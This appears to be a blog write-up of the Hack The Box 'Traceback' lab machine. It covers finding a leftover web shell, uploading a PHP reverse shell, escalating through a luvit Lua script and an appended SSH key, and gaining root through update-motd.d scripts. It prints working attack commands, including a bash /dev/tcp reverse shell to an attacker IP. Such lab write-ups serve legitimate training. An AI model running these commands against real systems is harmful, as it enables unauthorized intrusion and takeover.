HTB Traceback Writeup

Enumeration nmap -sC -sV 10.10.10.181

Here port 22 and 80 are open but we can’t see anything here coz both are on their latest version
Checking Host in our browser.

This site has been owned
I have left a backdoor for all the net. FREE INTERNETZZZ- Xh4H -This might be a hint let’s go to the source code and see if we can find something there.

<!--Some of the best web shells that you might need ;)-->

This caught my eyes whenever I find something in the source code I google it asap.

Yes, we’re going good 😉
We can see many webshells name there we write those on a txt file and passed them through curl.
cat phpnames.txt | while read line; do curl -IL http://10.10.10.181/$line; done

Got HTTP/1.1 200 OK on second last name which was smevk.php
Quickly opened the page it asked for password

We tried default admin:admin and it worked.Then uploaded a simple php-reverse-shell and fired up our nc to listen.

We got reverse shell here as webadmin.


After getting the reverse shell our first thing is to find user.txt
We searched the /home folder here we can see 2 directories
/sysadmin and /webadmin
Here sysadmin is not accessible from webadmin.
So we can try to read hidden files.

Here it shows /home/sysadmin/luvit executes lua scripts as sysadmin.
we can simply write a lua script which will be executed by sysadmin to get sysadmin’s priveleges
echo 'os.execute("/bin/sh/")' > privesc.lua

we got user.txt flag here next step is to find root flag
after exploring several things
We use the pspy tool to monitor the programs being executed in the system

we can see here the system is copying everything in /var/backups/.update-motd.d/ to /etc/update-motd.d/
After doing a google search about update-motd.d we came to know

Executable scripts in /etc/update-motd.d/* are executed by pam_motd(8) as the root user at each  login

We can login through ssh by appending our SSH keys to sysadmin/webadmin’s authorized_keys

echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuQdp02DODAYgB1fEFk53kJb5PkDf9BRAX8SeSNo0YKXL8NbPDAJx2bmZ/z6/HxhIkLWDYivOQaaEed14nNMJDubpZ/g0c6UWDG9xtkmNGn6NPRx2m4537+eUroBEz8M9XE9oyz5TmIcTNICb/j5R/nnYl1N1NgXtGYoSZcT3MhdM7Nes/cbrkes4Z/yrSU8kHzEfJ/801oSvjNI0SGlYepv72INpYI7YwjeSWG1VMaUPUeR00b+Frd/VZJ0GFWrP+gJQI+OxL0NyKPw2aN2ZHERmGaIzOsw7XwKcdnG5E5lAqfHmmhZ8U92PvDcv84FB/qSy+IOC+Z5eJPXGiKd7J root@parrot >> /home/sysadmin/.ssh/authorized_keys

Now adding a bash command in /etc/update-motd.d/00-header which will be executed by root.
echo "cat /root/root.txt" >> 00-header

Got the root.txt
We are not root till now but we can run commands as root.
So writing a reverse shell and executing it with root privileges can give root

echo "bash -i >& /dev/tcp/10.10.14.41/1233 0>&1" > /home/sysadmin/shell.sh

echo "bash /home/sysadmin/shell.sh" >> 00-header
executing that command as root by connecting through ssh and listening to the port with NC on my system
nc -lvp 1233

Done 🙂

Leave a Reply